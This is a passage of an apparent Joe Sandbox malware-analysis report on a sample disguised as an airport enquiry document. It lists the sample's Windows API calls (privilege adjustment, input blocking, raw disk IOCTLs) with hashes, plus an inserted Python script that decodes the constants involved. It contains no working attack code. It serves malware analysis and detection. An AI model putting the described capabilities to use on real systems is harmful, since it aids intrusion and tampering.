            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
            • String ID:
            • API String ID: 2576544623-0
            • Opcode ID: e1fde83ecc634a3bbf234d349ae9282ccd971a6b1b4f84104efe345a7ddc5f42
            • Instruction ID: bea6b43d4db552c650e21fa631ae8524b8b97196ce30a3996bce98ed7fbe0073
            • Opcode Fuzzy Hash: e1fde83ecc634a3bbf234d349ae9282ccd971a6b1b4f84104efe345a7ddc5f42
            • Instruction Fuzzy Hash: BC518C71504300AFD320EF20DC85AABB7E8EF94714F14492DF596972A1EB70EA09DB96
            APIs
            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CE40D1
            • _memset.LIBCMT ref: 00CE40F2
            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CE4144
            • CloseHandle.KERNEL32(00000000), ref: 00CE414D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseControlCreateDeviceFileHandle_memset
            • String ID:
            • API String ID: 1157408455-0
            • Opcode ID: 0719a95fb15de1e9108b0fdaeda5d6bef6227cd164cee11323653ea60ade6890
            • Instruction ID: 833650df1d78ad8ecaaff93414b622e4a1234c6eeb1cd19ef9fb08744fb5b783
            • Opcode Fuzzy Hash: 0719a95fb15de1e9108b0fdaeda5d6bef6227cd164cee11323653ea60ade6890
            • Instruction Fuzzy Hash: 361194759013287AD7309BA5AC4DFABBB7CEB45764F1041AAF908D7280D6744E808BA4
            APIs
            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CDEB19
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: lstrlen
            • String ID: ($|
            • API String ID: 1659193697-1631851259
            • Opcode ID: 187a195dae534a812103db0dd2a6721be2403712f6e3df3c904cf1a3a96c7e3c
            • Instruction ID: 4d0c60140b6e2d01342a8efcca1815fd63f1f0e8d3938ee4337555010ee75ee1
            • Opcode Fuzzy Hash: 187a195dae534a812103db0dd2a6721be2403712f6e3df3c904cf1a3a96c7e3c
            • Instruction Fuzzy Hash: 31323675A007059FCB28DF59C481A6AB7F0FF48320B15C56EE9AADB3A1E770E941CB44
            APIs
            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00CF26D5
            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CF270C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$AvailableDataFileQueryRead
            • String ID:
            • API String ID: 599397726-0
            • Opcode ID: 319e2dbeb6665e23a42bfdba5b6ba3b2482b6a695479d6150fd295fcad78d697
            • Instruction ID: 92db91be47aaf5c73d7ae18da6e71b9230deda9dbb496b5e8acba257e0cb41a4
            • Opcode Fuzzy Hash: 319e2dbeb6665e23a42bfdba5b6ba3b2482b6a695479d6150fd295fcad78d697
            • Instruction Fuzzy Hash: 0741F67150030DBFEB60EF95CC85EBBB7BCEB40718F10406AFB15E6140EA719E41A666
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEB5AE
            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CEB608
            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CEB655
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$DiskFreeSpace
            • String ID:
            • API String ID: 1682464887-0
            • Opcode ID: c94b5de362325781a97a1c3d62f45a4d92a25b4ccaade5bd9b32924434795e44
            • Instruction ID: 238567b09b1281d5347f58f077609b5a0826c4156aa9f4747adf6ebfb2490acf
            • Opcode Fuzzy Hash: c94b5de362325781a97a1c3d62f45a4d92a25b4ccaade5bd9b32924434795e44
            • Instruction Fuzzy Hash: ED216035A00618EFCB04EFA5D880AFEBBB8FF48314F1480A9E905EB351DB31A915DB55
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
            • GetLastError.KERNEL32 ref: 00CD8D47
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
            • String ID:
            • API String ID: 1922334811-0
            • Opcode ID: 8df390ebb790c6c2bdc5a0fa078c1b5c86e899d1dcfe733d0378a41f7a32cb56
            • Instruction ID: c99de591ad733c5e3d476ce80d9075e45b9cfba27811894666efc17228b9399e
            • Opcode Fuzzy Hash: 8df390ebb790c6c2bdc5a0fa078c1b5c86e899d1dcfe733d0378a41f7a32cb56
            • Instruction Fuzzy Hash: F911BFB1414309AFE728DF54DC85E6BB7BDEB44714B20852EF55693741EB30BC408A20
            APIs
            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CE4C2C
            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CE4C43
            • FreeSid.ADVAPI32(?), ref: 00CE4C53
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateCheckFreeInitializeMembershipToken
            • String ID:
            • API String ID: 3429775523-0
            • Opcode ID: 306d062bd02a4b5868af82e7277c22d92e010774f47113916fc560d6b703aa2b
            • Instruction ID: 4280965dfdf0d05c3a09f15d472f065cdbacdd0d63220ae9d58c4d6a6632aa20
            • Opcode Fuzzy Hash: 306d062bd02a4b5868af82e7277c22d92e010774f47113916fc560d6b703aa2b
            • Instruction Fuzzy Hash: 5BF04975A1130CBFDF04DFF0DC89BAEBBBCEF08201F1044A9A905E2681E6746A048B60
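The two entries above for CreateFileW/DeviceIoControl (00CE40D1 to 00CE414D) and AllocateAndInitializeSid/CheckTokenMembership (00CE4C2C to 00CE4C53) print their arguments as raw hex. The Python below is an added example, not part of the Joe Sandbox report, that decodes those constants the way an analyst does before writing a triage note: it splits the IOCTL number with the CTL_CODE layout from winioctl.h, expands the CreateFileW bit masks, and rebuilds the SID. It assumes the SID identifier authority is SECURITY_NT_AUTHORITY (5), which the listing shows only as "?", and the IOCTL names in the lookup table are computed from the CTL_CODE definitions in the Windows SDK headers (ntddscsi.h, ntddstor.h, ntdddisk.h).

```python
"""Decode Win32 constants as they appear in a sandbox API-call listing.

Added illustration, not part of the Joe Sandbox report. Input values are the
ones printed there: DeviceIoControl(..., 0004D02C, ..., 00000200, ...),
CreateFileW(?, C0000000, 00000003, 0, 00000003, 00000080, 0) and
AllocateAndInitializeSid(?, 00000002, 00000020, 00000220, ...).
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# CTL_CODE layout (winioctl.h):
#   bits 31..16 DeviceType | 15..14 Access | 13..2 Function | 1..0 Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x02: "FILE_DEVICE_CD_ROM", 0x04: "FILE_DEVICE_CONTROLLER",
                0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
                0x2D: "FILE_DEVICE_MASS_STORAGE"}
# Names computed from the SDK CTL_CODE definitions (IOCTL_SCSI_BASE is
# FILE_DEVICE_CONTROLLER, 0x04; IOCTL_STORAGE_BASE is 0x2D; disk is 0x07).
KNOWN_IOCTLS = {
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",
    0x0004D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    0x0004D02C: "IOCTL_ATA_PASS_THROUGH",
    0x0004D030: "IOCTL_ATA_PASS_THROUGH_DIRECT",
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
    0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
}


@dataclass
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int
    name: Optional[str]

    def describe(self) -> str:
        dev = DEVICE_TYPES.get(self.device_type, f"0x{self.device_type:X}")
        return (f"0x{self.code:08X} {self.name or '<unknown>'}: {dev}, "
                f"function 0x{self.function:03X}, {METHODS[self.method]}, "
                f"{ACCESS[self.access]}")


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE macro: rebuild an IOCTL number from its four fields."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> Ioctl:
    """Split an IOCTL number into its fields and look up a known name."""
    return Ioctl(code=code, device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3, function=(code >> 2) & 0xFFF,
                 method=code & 0x3, name=KNOWN_IOCTLS.get(code))


# Bit-flag tables for the CreateFileW arguments in the listing.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE",
              0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit mask into named flags; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit == bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


# AllocateAndInitializeSid(authority, count, sub1, sub2, ...) -> "S-1-a-s1-s2".
SECURITY_NT_AUTHORITY = 5  # assumption: the listing prints the authority as "?"
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators",
                   "S-1-5-32-545": "BUILTIN\\Users",
                   "S-1-5-18": "NT AUTHORITY\\SYSTEM"}


def sid_string(authority: int, sub_authorities: List[int]) -> str:
    return "S-1-" + "-".join(str(x) for x in [authority, *sub_authorities])


def sid_account(sid: str) -> Optional[str]:
    return WELL_KNOWN_SIDS.get(sid)


def decode_listing() -> Dict[str, str]:
    """Decode the constants the report prints for these two functions."""
    sid = sid_string(SECURITY_NT_AUTHORITY, [0x20, 0x220])
    return {
        "DeviceIoControl": decode_ioctl(0x0004D02C).describe(),
        "CreateFileW": " / ".join([
            "|".join(decode_flags(0xC0000000, GENERIC_ACCESS)),
            "|".join(decode_flags(0x3, SHARE_MODE)), CREATION[3]]),
        "AllocateAndInitializeSid": f"{sid} ({sid_account(sid)})",
    }


if __name__ == "__main__":
    for api, meaning in decode_listing().items():
        print(f"{api}: {meaning}")
```

With the report's values the IOCTL decodes to device type 0x04, function 0x40B, METHOD_BUFFERED with read and write access, and the two sub-authorities 0x20 and 0x220 give S-1-5-32-544; CheckTokenMembership against that SID is the usual "is the caller an administrator" test, so the function at 00CE4C2C is best read as an admin check rather than anything that changes privileges.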
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2626063dfc20c0c04a33736add737796f666ebaf18709c64c71406420292ce8
            • Instruction ID: 55fff33e6dc17285992e2c0352d9d502a0f08bad4838713ba644851066fe868c
            • Opcode Fuzzy Hash: b2626063dfc20c0c04a33736add737796f666ebaf18709c64c71406420292ce8
            • Instruction Fuzzy Hash: 6B22BE70A00216DFDB24EF54C484BAEB7F0FF49308F148169E866AB351E770AE81DB95
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 00CEC966
            • FindClose.KERNEL32(00000000), ref: 00CEC996
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 69a1e1bdb6cde1db97efbc3a20bb30e6f81ac1393ef725ee73f825c665f80c4b
            • Instruction ID: 90bacfac2496df65c445c183b097eff28eb7bb74c00f2adac0ef612b63885896
            • Opcode Fuzzy Hash: 69a1e1bdb6cde1db97efbc3a20bb30e6f81ac1393ef725ee73f825c665f80c4b
            • Instruction Fuzzy Hash: B911A1326102009FD710EF29C885A2AF7E9FF84324F04851EF9AAD7391DB30AC01DB95
            APIs
            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CF977D,?,00D0FB84,?), ref: 00CEA302
            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CF977D,?,00D0FB84,?), ref: 00CEA314
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorFormatLastMessage
            • String ID:
            • API String ID: 3479602957-0
            • Opcode ID: 8a7aa38f57ff4502626f5123198422919d4b74b2f48fb9a2317a063df22244b0
            • Instruction ID: 2116e99dbed6ce2182b3be6004131b9376ec58f751b71201f4f84b62d8f6c991
            • Opcode Fuzzy Hash: 8a7aa38f57ff4502626f5123198422919d4b74b2f48fb9a2317a063df22244b0
            • Instruction Fuzzy Hash: 62F0823554532DABDB20AFA5CC48FEA776DFF08761F004266F918D6291D630E940CBB1
            APIs
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD8851), ref: 00CD8728
            • CloseHandle.KERNEL32(?,?,00CD8851), ref: 00CD873A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AdjustCloseHandlePrivilegesToken
            • String ID:
            • API String ID: 81990902-0
            • Opcode ID: 880379727a5edaab4c3dd5d68adcd8ffa8136dd234d665853f177b20294439b6
            • Instruction ID: 05b515a930b215ac76e235837a1be96650530409a3ea39ed003ddda21e41c4da
            • Opcode Fuzzy Hash: 880379727a5edaab4c3dd5d68adcd8ffa8136dd234d665853f177b20294439b6
            • Instruction Fuzzy Hash: 27E0BF75010611EEE7352B60EC05E7777A9EB04754B258429F966C0570DB616C90DB10
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CA8F97,?,?,?,00000001), ref: 00CAA39A
            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CAA3A3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 8128ccbb884019d29d92628b14791a20652ec7e0ce4d2ac2014e6d786b8a31e7
            • Instruction ID: 41c04fba83096621bbbd216ea53b6a7dd1f5c93dd2fc97a0ec00bf3b14434663
            • Opcode Fuzzy Hash: 8128ccbb884019d29d92628b14791a20652ec7e0ce4d2ac2014e6d786b8a31e7
            • Instruction Fuzzy Hash: F2B09231058308ABCA102B91EC09B883F68EB45AB2F504020F60DC4A60CBA254508AA1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 70b6a18a3364060ea0bc331e03da43af5368f37fb988249d5567dec8d570bf2a
            • Instruction ID: 88fca77d2b935128eda1cfc7ba7201d097479bf173bb9b710f3942761a763bf7
            • Opcode Fuzzy Hash: 70b6a18a3364060ea0bc331e03da43af5368f37fb988249d5567dec8d570bf2a
            • Instruction Fuzzy Hash: CB323521D69F025DD7239635D932336A258AFB73D8F14D73BE829B5AA6EF38C5830110
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 192bc55613b87d403f92a6970f8248c9b81096689fd47d82499131c82a430c3e
            • Instruction ID: 17396cec3a38a0861212bd475e75c5d19e38597c7d5a3bf37617290cd4787b90
            • Opcode Fuzzy Hash: 192bc55613b87d403f92a6970f8248c9b81096689fd47d82499131c82a430c3e
            • Instruction Fuzzy Hash: CAB1FF20E2AF515DD32396398831336FA4CAFBB2D5F51D71BFC2AB4E22EB2185834141
            APIs
            • __time64.LIBCMT ref: 00CE8B25
              • Part of subcall function 00CA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CE91F8,00000000,?,?,?,?,00CE93A9,00000000,?), ref: 00CA5443
              • Part of subcall function 00CA543A: __aulldiv.LIBCMT ref: 00CA5463
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Time$FileSystem__aulldiv__time64
            • String ID:
            • API String ID: 2893107130-0
            • Opcode ID: f5b9d6f50007009c7e4f90014ec854de2c039ec86f6fadbb77d8d38aebad5d9e
            • Instruction ID: 2ba59dcd7be95ad334f05f6d67d2133c8cca5a0f6f965e22ae88b5febfd8a7b8
            • Opcode Fuzzy Hash: f5b9d6f50007009c7e4f90014ec854de2c039ec86f6fadbb77d8d38aebad5d9e
            • Instruction Fuzzy Hash: CA21E4726356108FC729CF25D841A52B3E1EBA5321B288E6CD1F9CF2D0CA74B945CB94
            APIs
            • BlockInput.USER32(00000001), ref: 00CF4218
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BlockInput
            • String ID:
            • API String ID: 3456056419-0
            • Opcode ID: 3c62c53809bd3769f6bc6e501dbaf54252fbc2cf97c8312acab1948ed8fbb619
            • Instruction ID: d3ddaf8c2a1ae355953561567b5eea359384ace71fd5af7b1ea2757a8ab9a110
            • Opcode Fuzzy Hash: 3c62c53809bd3769f6bc6e501dbaf54252fbc2cf97c8312acab1948ed8fbb619
            • Instruction Fuzzy Hash: 3EE04F312402189FC714EF5AD844AABF7E8EF94760F05802AFD4AC7352DA71E840DBA1
            APIs
            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CE4EEC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: mouse_event
            • String ID:
            • API String ID: 2434400541-0
            • Opcode ID: f31960e22be2db53703bd0dde0da757fd817155b101ac75ef45ecccc1dd11be8
            • Instruction ID: 803809828143461573cff8764872c24552217c012657092a28fb03ac90ab1e1c
